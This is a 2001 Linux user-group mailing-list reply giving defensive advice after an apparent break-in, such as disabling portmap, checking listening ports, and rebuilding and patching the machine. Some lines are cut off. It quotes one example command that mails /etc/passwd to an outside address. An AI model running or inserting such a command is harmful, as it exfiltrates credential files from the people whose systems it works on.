SLUG Mailing List Archives
Re: [SLUG] Security Breach
- To: Sean Carmody <sean@xxxxxxxxxxxxxxxxxxxxxxxxxxx>
- Subject: Re: [SLUG] Security Breach
- From: Umar Goldeli <umar@xxxxxxxxxxxxxx>
- Date: Wed Feb 28 11:35:02 2001
- Cc: slug@xxxxxxxxxxx
> Feb 28 01:53:07 emu portmap: connect from 126.96.36.199 to
> getport(status): request from unauthorized host
Why are you rnning the portmapper? Turn it off if youdon't specifically
a "netstat -an | grep LISTEN" will show you "evilthings(tm)" ;)
If you don't recognize it as something you specifically need - turn it
Either way, chances are that this is not how they got in - he probably did
an rpcinfo -p <yourip> or similar and your config recognized that he
As above - if you don't need portmap, turn it off.
> Has anyone come across something similar? I've no idea whether this is
> the result of a trojan, or whether someone managed to gain access to
> my machine (although if they did gain root access, why mail out a passwd
> file?). Any thoughts?
Remember - root access is generally the *eventual* goal... just because he
got in as userx, doesn't mean he has root, or even a shell for that
matter. It could be as simple as a buffer oveflow with something like
"/bin/mailx < /etc/passwd bob@xxxxxxxxxxx" etc.. (or somehting like
It could be anything.. either way - you know that something has
happened. Make an executive decision to decide if it has (I think it
has) and pull the box from production, rebuild it, secure it, patch it,
then change all user passwords (if any).
If you can, pull the box out of prod and put in a new box while you
examine the compromised one.